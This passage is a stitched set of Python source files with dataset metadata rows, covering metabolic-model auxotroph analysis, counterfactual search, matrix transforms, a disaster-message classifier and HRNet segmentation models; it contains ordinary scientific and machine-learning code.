                      , IConsBranch("bootstrap.B", 2, blk(IReturn(IFCall("Prelude.failed"))))
                      ]
                  )
            )))
          ]
      )
def getlist():
    """Build the test module 'mylist': a cons/nil list type, no functions."""
    return IModule(
        name='mylist', imports=['Prelude'], functions=[]
      , types=[
            IType(
                name='mylist.List'
              , constructors=[
                    IConstructor('mylist.Cons', 2)  # head and tail
                  , IConstructor('mylist.Nil', 0)   # empty list
                  ]
              )
          ]
      )
def getx():
    """Build the single-constructor test module 'X'."""
    x_constructor = IConstructor('X.X', 1)
    x_type = IType(name='X.X', constructors=[x_constructor])
    return IModule(name='X', imports=['Prelude'], functions=[], types=[x_type])
def getexample():
    """Load the example ICurry module from its JSON file."""
    example_path = 'data/json/example.json'
    return load(example_path)
| en | 0.868464 | Defines in pure ICurry a few simple modules designed for system testing. # An arbitrary choice id. # Nullary # A distinct nullary, to test choices. # Unary # Binary # ^^^ # Not correctly typed, but three arguments are needed here. # Evaluates its argument and then returns a FWD node refering to it. | 2.497217 | 2 |
optaux/helper_functions/characterize_auxotrophs.py | coltonlloyd/OptAux | 1 | 6617368 | import cobra
from cobra.flux_analysis.parsimonious import optimize_minimal_flux
import numpy as np
def get_auxotrophic_mets_per_ko(cons_model, KOs, growth_rate=.1):
    """Return ids of exchange reactions whose uptake rescues a KO strain.

    Each reaction id in *KOs* is knocked out on a copy of *cons_model*. If the
    strain still grows above *growth_rate* it is not auxotrophic and [] is
    returned. Otherwise every 'EX_' exchange reaction is opened (lower bound
    -10) one at a time and recorded when it restores growth.

    NOTE(review): the rescue check uses the hard-coded threshold .1 rather
    than the *growth_rate* parameter — confirm whether that is intentional.
    """
    metabolite_list = []
    model = cons_model.copy()
    for r in KOs:
        model.reactions.get_by_id(r).knock_out()
    if model.optimize().f > growth_rate:
        return []
    # Work on the raw gurobi LP so bounds can be toggled without rebuilding
    # the whole problem for every exchange reaction.
    solver = cobra.solvers.solver_dict['gurobi']
    lp = solver.create_problem(model)
    for rxn in model.reactions.query('EX_'):
        old_bounds = (rxn.lower_bound, rxn.upper_bound)
        index = model.reactions.index(rxn)
        # Temporarily allow uptake of this metabolite.
        solver.change_variable_bounds(lp, index, -10., old_bounds[1])
        solver.solve_problem(lp)
        # get the status and growth rate
        status = solver.get_status(lp)
        # reset the problem
        solver.change_variable_bounds(lp, index, old_bounds[0], old_bounds[1])
        f = solver.get_objective_value(lp) if status == "optimal" else 0.
        if f > .1:
            metabolite_list.append(rxn.id)
    return metabolite_list
def get_avg_flux_required(cons_model, KOs, aux_metabolite_list):
    """Average exchange flux needed to sustain growth of 0.1 in the KO strain.

    For each auxotrophic exchange reaction (water excluded), growth is fixed
    at 0.1 and the exchange flux is optimised; the mean of the recorded
    fluxes is returned, or None when none could be computed.
    """
    fluxes = []
    model = cons_model.copy()
    biomass = list(model.objective.keys())[0]
    for ko_id in KOs:
        model.reactions.get_by_id(ko_id).knock_out()
    for rxn_id in aux_metabolite_list:
        if rxn_id == 'EX_h2o_e':
            continue  # water exchange is not a meaningful auxotrophy
        r_obj = model.reactions.get_by_id(rxn_id)
        model.objective = biomass
        r_obj.lower_bound = -10
        # Fix growth at 0.1 and optimise the exchange flux instead.
        biomass.lower_bound = .1
        biomass.upper_bound = .1
        model.objective = r_obj
        sol2 = model.optimize()
        try:
            print(rxn_id, sol2.x_dict[rxn_id])
            fluxes.append(sol2.x_dict[rxn_id])
        except (KeyError, TypeError, AttributeError):
            # Infeasible solve (x_dict missing/None) or reaction absent.
            # The original used a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit.
            print(rxn_id, KOs, 'ISSUE')
        # Restore bounds for the next iteration.
        r_obj.lower_bound = 0.
        biomass.lower_bound = 0.
        biomass.upper_bound = 1000.
    if len(fluxes) > 0:
        return np.array(fluxes).mean()
    else:
        return None
def get_blocked_biomass(cons_model, KOs):
    """Return ids of biomass precursors that cannot be produced after *KOs*.

    A demand reaction is added for each biomass reactant in turn and set as
    the objective; precursors whose maximal production flux is below .1 are
    reported as blocked.
    """
    blocked = []
    model = cons_model.copy()
    biomass = list(model.objective.keys())[0]
    for r in KOs:
        model.reactions.get_by_id(r).knock_out()
    for metabolite in biomass.reactants:
        demand = cobra.Reaction('DM_' + metabolite.id)
        demand.add_metabolites({metabolite: -1})
        # NOTE(review): demand reactions accumulate in the model copy across
        # iterations (one DM_* per precursor); only the objective is switched.
        model.add_reaction(demand)
        model.change_objective(demand)
        sol2 = model.optimize()
        if sol2.f < .1:
            blocked.append(metabolite.id)
    return blocked
def gene_names_per_kos(model, KOs):
    """Gene-name rules of the knocked-out reactions (also echoed to stdout)."""
    gene_names = []
    for ko_id in KOs:
        rule = model.reactions.get_by_id(ko_id).gene_name_reaction_rule
        print(rule)
        gene_names.append(rule)
    return gene_names
def genes_per_kos(model, KOs):
    """Gene reaction rules of the knocked-out reactions, in input order."""
    return [model.reactions.get_by_id(ko_id).gene_reaction_rule
            for ko_id in KOs]
def to_string(items):
    """Join *items* into a single comma-separated string."""
    # Renamed the parameter: the original shadowed the builtin `list`.
    return ', '.join(items)
def and_join_strings(items):
    """Join *items* into a single ' & '-separated string."""
    # Renamed the parameter: the original shadowed the builtin `list`.
    return ' & '.join(items)
def id_to_name(model, ids):
    """Map reaction ids (prefixed 'EX_') or metabolite ids to display names."""
    names = []
    for identifier in ids:
        if identifier.startswith('EX_'):
            entry = model.reactions.get_by_id(identifier)
        else:
            entry = model.metabolites.get_by_id(identifier)
        names.append(entry.name)
    return names
| import cobra
from cobra.flux_analysis.parsimonious import optimize_minimal_flux
import numpy as np
def get_auxotrophic_mets_per_ko(cons_model, KOs, growth_rate=.1):
    """Return ids of exchange reactions whose uptake rescues a KO strain.

    Each reaction id in *KOs* is knocked out on a copy of *cons_model*. If the
    strain still grows above *growth_rate* it is not auxotrophic and [] is
    returned. Otherwise every 'EX_' exchange reaction is opened (lower bound
    -10) one at a time and recorded when it restores growth.

    NOTE(review): the rescue check uses the hard-coded threshold .1 rather
    than the *growth_rate* parameter — confirm whether that is intentional.
    """
    metabolite_list = []
    model = cons_model.copy()
    for r in KOs:
        model.reactions.get_by_id(r).knock_out()
    if model.optimize().f > growth_rate:
        return []
    # Work on the raw gurobi LP so bounds can be toggled without rebuilding
    # the whole problem for every exchange reaction.
    solver = cobra.solvers.solver_dict['gurobi']
    lp = solver.create_problem(model)
    for rxn in model.reactions.query('EX_'):
        old_bounds = (rxn.lower_bound, rxn.upper_bound)
        index = model.reactions.index(rxn)
        # Temporarily allow uptake of this metabolite.
        solver.change_variable_bounds(lp, index, -10., old_bounds[1])
        solver.solve_problem(lp)
        # get the status and growth rate
        status = solver.get_status(lp)
        # reset the problem
        solver.change_variable_bounds(lp, index, old_bounds[0], old_bounds[1])
        f = solver.get_objective_value(lp) if status == "optimal" else 0.
        if f > .1:
            metabolite_list.append(rxn.id)
    return metabolite_list
def get_avg_flux_required(cons_model, KOs, aux_metabolite_list):
    """Average exchange flux needed to sustain growth of 0.1 in the KO strain.

    For each auxotrophic exchange reaction (water excluded), growth is fixed
    at 0.1 and the exchange flux is optimised; the mean of the recorded
    fluxes is returned, or None when none could be computed.
    """
    fluxes = []
    model = cons_model.copy()
    biomass = list(model.objective.keys())[0]
    for ko_id in KOs:
        model.reactions.get_by_id(ko_id).knock_out()
    for rxn_id in aux_metabolite_list:
        if rxn_id == 'EX_h2o_e':
            continue  # water exchange is not a meaningful auxotrophy
        r_obj = model.reactions.get_by_id(rxn_id)
        model.objective = biomass
        r_obj.lower_bound = -10
        # Fix growth at 0.1 and optimise the exchange flux instead.
        biomass.lower_bound = .1
        biomass.upper_bound = .1
        model.objective = r_obj
        sol2 = model.optimize()
        try:
            print(rxn_id, sol2.x_dict[rxn_id])
            fluxes.append(sol2.x_dict[rxn_id])
        except (KeyError, TypeError, AttributeError):
            # Infeasible solve (x_dict missing/None) or reaction absent.
            # The original used a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit.
            print(rxn_id, KOs, 'ISSUE')
        # Restore bounds for the next iteration.
        r_obj.lower_bound = 0.
        biomass.lower_bound = 0.
        biomass.upper_bound = 1000.
    if len(fluxes) > 0:
        return np.array(fluxes).mean()
    else:
        return None
def get_blocked_biomass(cons_model, KOs):
    """Return ids of biomass precursors that cannot be produced after *KOs*.

    A demand reaction is added for each biomass reactant in turn and set as
    the objective; precursors whose maximal production flux is below .1 are
    reported as blocked.
    """
    blocked = []
    model = cons_model.copy()
    biomass = list(model.objective.keys())[0]
    for r in KOs:
        model.reactions.get_by_id(r).knock_out()
    for metabolite in biomass.reactants:
        demand = cobra.Reaction('DM_' + metabolite.id)
        demand.add_metabolites({metabolite: -1})
        # NOTE(review): demand reactions accumulate in the model copy across
        # iterations (one DM_* per precursor); only the objective is switched.
        model.add_reaction(demand)
        model.change_objective(demand)
        sol2 = model.optimize()
        if sol2.f < .1:
            blocked.append(metabolite.id)
    return blocked
def gene_names_per_kos(model, KOs):
    """Gene-name rules of the knocked-out reactions (also echoed to stdout)."""
    gene_names = []
    for ko_id in KOs:
        rule = model.reactions.get_by_id(ko_id).gene_name_reaction_rule
        print(rule)
        gene_names.append(rule)
    return gene_names
def genes_per_kos(model, KOs):
    """Gene reaction rules of the knocked-out reactions, in input order."""
    return [model.reactions.get_by_id(ko_id).gene_reaction_rule
            for ko_id in KOs]
def to_string(items):
    """Join *items* into a single comma-separated string.

    The parameter was renamed from ``list``, which shadowed the builtin.
    """
    return ', '.join(items)
def and_join_strings(items):
    """Join *items* with ' & ' separators.

    The parameter was renamed from ``list``, which shadowed the builtin.
    """
    return ' & '.join(items)
def id_to_name(model, ids):
    """Map ids to display names: 'EX_'-prefixed ids are reactions, others metabolites."""
    return [
        model.reactions.get_by_id(identifier).name
        if identifier.startswith('EX_')
        else model.metabolites.get_by_id(identifier).name
        for identifier in ids
    ]
| en | 0.711163 | # get the status and growth rate # reset the problem # sol = model.optimize() | 2.178311 | 2 |
nice/utils/optimization/heuristic.py | DBrughmans/NICE | 17 | 6617369 | from abc import ABC,abstractmethod
from nice.utils.optimization.reward import *
import numpy as np
class optimization(ABC):
    """Abstract base class for counterfactual search strategies."""

    @abstractmethod
    def optimize(self):
        # Subclasses implement the search and return a counterfactual instance.
        pass
class best_first(optimization):
    """Greedy best-first search: repeatedly copies single feature values from
    the nearest unlike neighbour ``NN`` into the candidate until the model
    predicts a target class."""

    def __init__(self, data, reward_function: RewardFunction):
        self.reward_function = reward_function
        self.data = data

    def optimize(self, NN):
        """Return the first candidate whose prediction falls in ``data.target_class``.

        NOTE(review): as in the original there is no failure exit -- if no
        substitution ever flips the prediction this loops forever.
        """
        CF_candidate = self.data.X.copy()
        while True:  # replaces the dead 'stop' flag and 'while stop == False'
            # Columns where the candidate still differs from the neighbour.
            diff = np.where(CF_candidate != NN)[1]
            # One candidate row per single-feature substitution.
            X_prune = np.tile(CF_candidate, (len(diff), 1))
            for row, col in enumerate(diff):
                X_prune[row, col] = NN[0, col]
            CF_candidate = self.reward_function.calculate_reward(X_prune, CF_candidate)
            if self.data.predict_fn(CF_candidate).argmax() in self.data.target_class:
                return CF_candidate
| from abc import ABC,abstractmethod
from nice.utils.optimization.reward import *
import numpy as np
class optimization(ABC):
    """Abstract base class for counterfactual search strategies."""

    @abstractmethod
    def optimize(self):
        # Subclasses implement the search and return a counterfactual instance.
        pass
class best_first(optimization):
    """Greedy best-first search: repeatedly copies single feature values from
    the nearest unlike neighbour ``NN`` into the candidate until the model
    predicts a target class."""

    def __init__(self, data, reward_function: RewardFunction):
        self.reward_function = reward_function
        self.data = data

    def optimize(self, NN):
        """Return the first candidate whose prediction falls in ``data.target_class``.

        NOTE(review): as in the original there is no failure exit -- if no
        substitution ever flips the prediction this loops forever.
        """
        CF_candidate = self.data.X.copy()
        while True:  # replaces the dead 'stop' flag and 'while stop == False'
            # Columns where the candidate still differs from the neighbour.
            diff = np.where(CF_candidate != NN)[1]
            # One candidate row per single-feature substitution.
            X_prune = np.tile(CF_candidate, (len(diff), 1))
            for row, col in enumerate(diff):
                X_prune[row, col] = NN[0, col]
            CF_candidate = self.reward_function.calculate_reward(X_prune, CF_candidate)
            if self.data.predict_fn(CF_candidate).argmax() in self.data.target_class:
                return CF_candidate
| none | 1 | 3.246669 | 3 | |
pyoptix/matrix4x4.py | juhyeonkim95/PyOptiX | 0 | 6617370 | import math
import numpy as np
class Matrix4x4:
    """A 4x4 homogeneous rigid-transform matrix stored as float32.

    The upper-left 3x3 block is assumed to be a pure rotation; that
    assumption is what makes the transpose-based ``inverse`` valid.
    """

    def __init__(self):
        # Start from the identity transform.
        self.matrix = np.eye(4, dtype=np.float32)

    @staticmethod
    def from_basis(u, v, w, c):
        """Build a transform whose columns are basis vectors u, v, w and origin c."""
        result = Matrix4x4()
        for col, vec in enumerate((u, v, w, c)):
            for row in range(3):
                result.matrix[row, col] = vec[row]
        return result

    def inverse(self):
        """Return the inverse, exploiting R^-1 = R^T for the rotation block."""
        inv = Matrix4x4()
        rot_t = self.matrix[0:3, 0:3].T
        inv.matrix[0:3, 0:3] = rot_t
        inv.matrix[0:3, 3] = -rot_t.dot(self.matrix[0:3, 3])
        return inv

    def to_parameters(self, as_degree=False):
        """Return [tx, ty, tz, rx, ry, rz]; angles in radians unless *as_degree*."""
        tx, ty, tz = self.matrix[0:3, 3]
        angles = self.mat2euler(self.matrix[0:3, 0:3])
        if as_degree:
            angles = tuple(math.degrees(angle) for angle in angles)
        return np.array([tx, ty, tz, *angles])

    @staticmethod
    def mat2euler(M, cy_thresh=None):
        """Convert a 3x3 rotation matrix to (x, y, z) Euler angles.

        Near the gimbal-lock singularity (cos(y) ~ 0, detected via
        *cy_thresh*) the x angle is fixed at 0 and z absorbs the remainder.
        """
        M = np.asarray(M)
        if cy_thresh is None:
            try:
                cy_thresh = np.finfo(M.dtype).eps * 4
            except ValueError:
                # Integer dtypes have no eps; fall back to float precision.
                cy_thresh = np.finfo(float).eps * 4.0
        r11, r12, r13, r21, r22, r23, r31, r32, r33 = M.flat
        cy = math.sqrt(r23 * r23 + r33 * r33)
        if cy > cy_thresh:
            x = math.atan2(-r23, r33)
            z = math.atan2(-r12, r11)
        else:
            x = 0.0
            z = math.atan2(r21, r22)
        y = math.atan2(r13, cy)
        return x, y, z
| import math
import numpy as np
class Matrix4x4:
    """A 4x4 homogeneous rigid-transform matrix stored as float32.

    The upper-left 3x3 block is assumed to be a pure rotation; that
    assumption is what makes the transpose-based ``inverse`` valid.
    """

    def __init__(self):
        # Start from the identity transform.
        self.matrix = np.eye(4, dtype=np.float32)

    @staticmethod
    def from_basis(u, v, w, c):
        """Build a transform whose columns are basis vectors u, v, w and origin c."""
        result = Matrix4x4()
        for col, vec in enumerate((u, v, w, c)):
            for row in range(3):
                result.matrix[row, col] = vec[row]
        return result

    def inverse(self):
        """Return the inverse, exploiting R^-1 = R^T for the rotation block."""
        inv = Matrix4x4()
        rot_t = self.matrix[0:3, 0:3].T
        inv.matrix[0:3, 0:3] = rot_t
        inv.matrix[0:3, 3] = -rot_t.dot(self.matrix[0:3, 3])
        return inv

    def to_parameters(self, as_degree=False):
        """Return [tx, ty, tz, rx, ry, rz]; angles in radians unless *as_degree*."""
        tx, ty, tz = self.matrix[0:3, 3]
        angles = self.mat2euler(self.matrix[0:3, 0:3])
        if as_degree:
            angles = tuple(math.degrees(angle) for angle in angles)
        return np.array([tx, ty, tz, *angles])

    @staticmethod
    def mat2euler(M, cy_thresh=None):
        """Convert a 3x3 rotation matrix to (x, y, z) Euler angles.

        Near the gimbal-lock singularity (cos(y) ~ 0, detected via
        *cy_thresh*) the x angle is fixed at 0 and z absorbs the remainder.
        """
        M = np.asarray(M)
        if cy_thresh is None:
            try:
                cy_thresh = np.finfo(M.dtype).eps * 4
            except ValueError:
                # Integer dtypes have no eps; fall back to float precision.
                cy_thresh = np.finfo(float).eps * 4.0
        r11, r12, r13, r21, r22, r23, r31, r32, r33 = M.flat
        cy = math.sqrt(r23 * r23 + r33 * r33)
        if cy > cy_thresh:
            x = math.atan2(-r23, r33)
            z = math.atan2(-r12, r11)
        else:
            x = 0.0
            z = math.atan2(r21, r22)
        y = math.atan2(r13, cy)
        return x, y, z
| none | 1 | 2.581553 | 3 | |
models/train_classifier.py | rojandhimal/Disaster_Response_Pipelines | 1 | 6617371 | <reponame>rojandhimal/Disaster_Response_Pipelines<filename>models/train_classifier.py
# import libraries
import nltk
import numpy as np
import sqlite3
nltk.download(['punkt', 'wordnet'])
from nltk.tokenize import word_tokenize, RegexpTokenizer
from nltk.stem import WordNetLemmatizer
import pandas as pd
from sqlalchemy import create_engine
import re
from sklearn.pipeline import Pipeline
from sklearn.ensemble import RandomForestClassifier
from sklearn.multioutput import MultiOutputClassifier
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.metrics import precision_recall_fscore_support, classification_report
from sklearn.tree import DecisionTreeClassifier
import pickle
import os
import sys
def load_data(database_filepath):
    """Load the 'Disaster' table and split it into features and labels.

    Args:
        database_filepath: path to the SQLite database file.

    Returns:
        Tuple ``(X, y, category_names)``: ``X`` is the message column,
        ``y`` holds the category indicator columns (column 4 onward) and
        ``category_names`` lists those column names.
    """
    table_name = "Disaster"
    engine = create_engine(f"sqlite:///{database_filepath}")
    df = pd.read_sql_table(table_name,engine)
    # Drop rows (not columns) with nulls, except rows whose 'original' field
    # is missing while 'offer' is present -- TODO confirm this exception is
    # intentional.
    df = df[~(df.isnull().any(axis=1))|((df.original.isnull())&~(df.offer.isnull()))]
    X = df['message']
    y = df.iloc[:, 4:]
    category_names = list(df.columns[4:])
    return X,y,category_names
def tokenize(text):
    """Normalize *text* into lowercase, lemmatized, stripped tokens.

    URLs are first replaced with the literal token 'urlplaceholder', then
    the text is word-tokenized and each token lemmatized.
    """
    url_regex = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
    for url in re.findall(url_regex, text):
        text = text.replace(url, "urlplaceholder")
    lemmatizer = WordNetLemmatizer()
    return [lemmatizer.lemmatize(token).lower().strip()
            for token in word_tokenize(text)]
def build_model():
    """Build a GridSearchCV-wrapped multi-output text-classification model.

    Pipeline: CountVectorizer -> TfidfTransformer -> MultiOutput random
    forest; the grid searches tree depth and minimum leaf size.

    Returns:
        sklearn.model_selection.GridSearchCV: unfitted, ready for ``fit``.
    """
    pipeline = Pipeline([
        ('vect', CountVectorizer(tokenizer=tokenize)),
        ('tfidf', TfidfTransformer()),
        ('clf', MultiOutputClassifier(RandomForestClassifier()))
    ])
    # Small grid over forest regularization parameters.
    parameters = {'clf__estimator__max_depth': [10, 50, None],
                  'clf__estimator__min_samples_leaf':[2, 5, 10]}
    cv = GridSearchCV(pipeline, param_grid=parameters)
    return cv
def evaluate_model(model, X_test, Y_test, category_names):
    '''
    Print a per-category classification report for the fitted model.

    Inputs: model (fitted estimator), X_test, Y_test, category_names
    Outputs: prints the classification report to stdout; returns None.
    '''
    Y_pred = model.predict(X_test)
    # print scores
    # NOTE(review): both y_true (Y_test.iloc[:, 1:]) and y_pred (x[1:]) drop
    # the first category column -- confirm this offset is intentional.
    print(classification_report(Y_test.iloc[:,1:].values, np.array([x[1:] for x in Y_pred]),
        target_names=category_names))
def save_model(model, model_filepath):
    '''
    Serialize *model* to *model_filepath* with pickle.

    The file handle is now closed deterministically via a context manager
    (the original leaked the handle returned by ``open``).
    '''
    with open(model_filepath, 'wb') as handle:
        pickle.dump(model, handle)
def main():
    """CLI entry point: load data, train, evaluate and persist the classifier.

    Usage: python train_classifier.py <database_filepath> <model_filepath>
    """
    if len(sys.argv) == 3:
        database_filepath, model_filepath = sys.argv[1:]
        print('Loading data...\n DATABASE: {}'.format(database_filepath))
        X, Y, category_names = load_data(database_filepath)
        X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)
        print('Building model...')
        model = build_model()
        print('Training model...')
        # DataFrame.as_matrix() was removed in pandas 1.0; to_numpy() is the
        # supported replacement (available since pandas 0.24).
        model.fit(X_train.to_numpy(), Y_train.to_numpy())
        print('Evaluating model...')
        evaluate_model(model, X_test, Y_test, category_names)
        # Removed leftover debug prints that were flagged for cleanup.
        print('Saving model...\n MODEL: {}'.format(model_filepath))
        save_model(model, model_filepath)
        print('Trained model saved!')
    else:
        print('Please provide the filepath of the disaster messages database '\
              'as the first argument and the filepath of the pickle file to '\
              'save the model to as the second argument. \n\nExample: python '\
              'train_classifier.py ../data/DisasterResponse.db classifier.pkl')
if __name__ == '__main__':
main() | # import libraries
import nltk
import numpy as np
import sqlite3
nltk.download(['punkt', 'wordnet'])
from nltk.tokenize import word_tokenize, RegexpTokenizer
from nltk.stem import WordNetLemmatizer
import pandas as pd
from sqlalchemy import create_engine
import re
from sklearn.pipeline import Pipeline
from sklearn.ensemble import RandomForestClassifier
from sklearn.multioutput import MultiOutputClassifier
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.metrics import precision_recall_fscore_support, classification_report
from sklearn.tree import DecisionTreeClassifier
import pickle
import os
import sys
def load_data(database_filepath):
    """Load the 'Disaster' table and split it into features and labels.

    Args:
        database_filepath: path to the SQLite database file.

    Returns:
        Tuple ``(X, y, category_names)``: ``X`` is the message column,
        ``y`` holds the category indicator columns (column 4 onward) and
        ``category_names`` lists those column names.
    """
    table_name = "Disaster"
    engine = create_engine(f"sqlite:///{database_filepath}")
    df = pd.read_sql_table(table_name,engine)
    # Drop rows (not columns) with nulls, except rows whose 'original' field
    # is missing while 'offer' is present -- TODO confirm this exception is
    # intentional.
    df = df[~(df.isnull().any(axis=1))|((df.original.isnull())&~(df.offer.isnull()))]
    X = df['message']
    y = df.iloc[:, 4:]
    category_names = list(df.columns[4:])
    return X,y,category_names
def tokenize(text):
    """Normalize *text* into lowercase, lemmatized, stripped tokens.

    URLs are first replaced with the literal token 'urlplaceholder', then
    the text is word-tokenized and each token lemmatized.
    """
    url_regex = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
    for url in re.findall(url_regex, text):
        text = text.replace(url, "urlplaceholder")
    lemmatizer = WordNetLemmatizer()
    return [lemmatizer.lemmatize(token).lower().strip()
            for token in word_tokenize(text)]
def build_model():
    """Build a GridSearchCV-wrapped multi-output text-classification model.

    Pipeline: CountVectorizer -> TfidfTransformer -> MultiOutput random
    forest; the grid searches tree depth and minimum leaf size.

    Returns:
        sklearn.model_selection.GridSearchCV: unfitted, ready for ``fit``.
    """
    pipeline = Pipeline([
        ('vect', CountVectorizer(tokenizer=tokenize)),
        ('tfidf', TfidfTransformer()),
        ('clf', MultiOutputClassifier(RandomForestClassifier()))
    ])
    # Small grid over forest regularization parameters.
    parameters = {'clf__estimator__max_depth': [10, 50, None],
                  'clf__estimator__min_samples_leaf':[2, 5, 10]}
    cv = GridSearchCV(pipeline, param_grid=parameters)
    return cv
def evaluate_model(model, X_test, Y_test, category_names):
    '''
    Print a per-category classification report for the fitted model.

    Inputs: model (fitted estimator), X_test, Y_test, category_names
    Outputs: prints the classification report to stdout; returns None.
    '''
    Y_pred = model.predict(X_test)
    # print scores
    # NOTE(review): both y_true (Y_test.iloc[:, 1:]) and y_pred (x[1:]) drop
    # the first category column -- confirm this offset is intentional.
    print(classification_report(Y_test.iloc[:,1:].values, np.array([x[1:] for x in Y_pred]),
        target_names=category_names))
def save_model(model, model_filepath):
    '''
    Serialize *model* to *model_filepath* with pickle.

    The file handle is now closed deterministically via a context manager
    (the original leaked the handle returned by ``open``).
    '''
    with open(model_filepath, 'wb') as handle:
        pickle.dump(model, handle)
def main():
    """CLI entry point: load data, train, evaluate and persist the classifier.

    Usage: python train_classifier.py <database_filepath> <model_filepath>
    """
    if len(sys.argv) == 3:
        database_filepath, model_filepath = sys.argv[1:]
        print('Loading data...\n DATABASE: {}'.format(database_filepath))
        X, Y, category_names = load_data(database_filepath)
        X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)
        print('Building model...')
        model = build_model()
        print('Training model...')
        # DataFrame.as_matrix() was removed in pandas 1.0; to_numpy() is the
        # supported replacement (available since pandas 0.24).
        model.fit(X_train.to_numpy(), Y_train.to_numpy())
        print('Evaluating model...')
        evaluate_model(model, X_test, Y_test, category_names)
        # Removed leftover debug prints that were flagged for cleanup.
        print('Saving model...\n MODEL: {}'.format(model_filepath))
        save_model(model, model_filepath)
        print('Trained model saved!')
    else:
        print('Please provide the filepath of the disaster messages database '\
              'as the first argument and the filepath of the pickle file to '\
              'save the model to as the second argument. \n\nExample: python '\
              'train_classifier.py ../data/DisasterResponse.db classifier.pkl')
if __name__ == '__main__':
main() | en | 0.688438 | # import libraries This function load data from database from given database_filepath. process and slit the data as label and features (x ,y, categoory_name) Input args: Database file path Output : returnd seperated feature and labels (X,y,categoory_name) # drop columns with null This function take text and return token of words Input args: Text Output: List of clean token Build Multiclass Randomforest model Create pipeline Hypertune model Input : N/A Output: returns Hypertuned model This function evaluate the model and return the classification and accurancy score. Inputs: Model, X_test, y_test, Catgegory_names Outputs: Prints the Classification report & Accuracy Score # print scores Function to save the model Input: model and the file path to save the model Output: save the model as pickle file in the give filepath ###WILL NEED TO CXLEAN THIS UP | 2.839686 | 3 |
seg/lib/models/nets/hrnet.py | Frank-Abagnal/HRFormer | 254 | 6617372 | ##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
## Created by: RainbowSecret
## Microsoft Research
## <EMAIL>
## Copyright (c) 2018
##
## This source code is licensed under the MIT-style license found in the
## LICENSE file in the root directory of this source tree
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
import math
import os
import pdb
import warnings

import torch
import torch.nn as nn
import torch.nn.functional as F

from lib.models.backbones.backbone_selector import BackboneSelector
from lib.models.tools.module_helper import ModuleHelper
class HRNet_W48(nn.Module):
    """
    deep high-resolution representation learning for human pose estimation, CVPR2019

    The four HRNet branches are upsampled to the finest resolution,
    concatenated, and classified by a 3x3-conv + 1x1-conv head.
    """

    def __init__(self, configer):
        super(HRNet_W48, self).__init__()
        self.configer = configer
        self.num_classes = self.configer.get("data", "num_classes")
        self.backbone = BackboneSelector(configer).get_backbone()
        # Concatenated channels of the four HRNet branches: 48 + 96 + 192 + 384.
        in_channels = 720
        bn_type = self.configer.get("network", "bn_type")
        self.cls_head = nn.Sequential(
            nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1),
            ModuleHelper.BNReLU(in_channels, bn_type=bn_type),
            nn.Dropout2d(0.10),
            nn.Conv2d(in_channels, self.num_classes, kernel_size=1,
                      stride=1, padding=0, bias=False),
        )

    def forward(self, x_):
        branches = self.backbone(x_)
        _, _, h, w = branches[0].size()
        # Bring every coarser branch up to the finest branch's resolution.
        upsampled = [branches[0]] + [
            F.interpolate(feat, size=(h, w), mode="bilinear", align_corners=True)
            for feat in branches[1:4]
        ]
        fused = torch.cat(upsampled, 1)
        logits = self.cls_head(fused)
        # Upsample logits back to the input resolution.
        return F.interpolate(logits, size=(x_.size(2), x_.size(3)),
                             mode="bilinear", align_corners=True)
class HRNet_W48_ASPOCR(nn.Module):
    """HRNet-W48 with an ASP-OCR head.

    Forward returns ``(out_aux, out)``: the auxiliary per-class maps and the
    refined prediction, both upsampled to the input resolution.
    """

    def __init__(self, configer):
        super(HRNet_W48_ASPOCR, self).__init__()
        self.configer = configer
        self.num_classes = self.configer.get("data", "num_classes")
        self.backbone = BackboneSelector(configer).get_backbone()
        # extra added layers
        in_channels = 720  # 48 + 96 + 192 + 384
        from lib.models.modules.spatial_ocr_block import SpatialOCR_ASP_Module

        self.asp_ocr_head = SpatialOCR_ASP_Module(
            features=720,
            hidden_features=256,
            out_features=256,
            dilations=(24, 48, 72),
            num_classes=self.num_classes,
            bn_type=self.configer.get("network", "bn_type"),
        )
        self.cls_head = nn.Conv2d(
            256, self.num_classes, kernel_size=1, stride=1, padding=0, bias=False
        )
        # Auxiliary classifier over the raw fused features.
        self.aux_head = nn.Sequential(
            nn.Conv2d(in_channels, 512, kernel_size=3, stride=1, padding=1),
            ModuleHelper.BNReLU(512, bn_type=self.configer.get("network", "bn_type")),
            nn.Conv2d(
                512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=False
            ),
        )

    def forward(self, x_):
        x = self.backbone(x_)
        _, _, h, w = x[0].size()
        # Upsample every branch to the finest resolution and fuse.
        feat1 = x[0]
        feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
        feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
        feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
        feats = torch.cat([feat1, feat2, feat3, feat4], 1)
        out_aux = self.aux_head(feats)  # soft object regions for the OCR head
        feats = self.asp_ocr_head(feats, out_aux)
        out = self.cls_head(feats)
        out_aux = F.interpolate(
            out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        out = F.interpolate(
            out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        return out_aux, out
class HRNet_W48_OCR(nn.Module):
    """HRNet-W48 with an OCR (object-contextual representation) head.

    Forward returns ``(out_aux, out)``: auxiliary soft object regions feed
    the OCR gather/distribute modules that refine the main prediction.
    """

    def __init__(self, configer):
        super(HRNet_W48_OCR, self).__init__()
        self.configer = configer
        self.num_classes = self.configer.get("data", "num_classes")
        self.backbone = BackboneSelector(configer).get_backbone()
        # Concatenated channels of the four HRNet branches (48+96+192+384).
        in_channels = 720
